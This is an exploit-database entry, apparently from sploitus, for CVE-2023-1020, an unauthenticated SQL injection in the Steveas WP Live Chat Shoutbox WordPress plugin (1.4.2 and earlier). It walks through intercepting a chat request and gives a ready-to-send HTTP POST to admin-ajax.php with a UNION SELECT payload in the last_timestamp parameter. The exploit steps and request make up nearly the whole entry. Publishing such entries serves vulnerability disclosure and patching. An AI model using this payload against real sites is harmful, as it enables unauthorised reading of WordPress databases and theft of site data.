Exploit for Steveas WP Live Chat Shoutbox <= 1.4.2 - Unauthenticated SQLi CVE-2023-1020

Name: Exploit for Steveas WP Live Chat Shoutbox <= 1.4.2 - Unauthenticated SQLi CVE-2023-1020
Rating: 5 (10 reviews)

2023-04-03 | CVSS 7.5

## https://sploitus.com/exploit?id=WPEX-ID:4E5AA9A3-65A0-47D6-BC26-A2FB6CB073FF
Submit a message in the chatbox, intercept the request using Burp Suite for example.

Edit the request to reflect this request: action=shoutbox-ajax-update-messages&last_timestamp=0)+UNION+ALL+SELECT+NULL,NULL,(SELECT+CONCAT(0x776562657870)),NULL,NULL,NULL,NULL,NULL--+&rooms%5B%5D=default

Send the Request, and it will succeed and also lists previous messages.

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Origin: http://localhost
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: Shoutbox_alias=Guest_209
Connection: close

action=shoutbox-ajax-update-messages&last_timestamp=0)+UNION+ALL+SELECT+NULL,NULL,(SELECT+CONCAT(0x776562657870)),NULL,NULL,NULL,NULL,NULL--+&rooms%5B%5D=default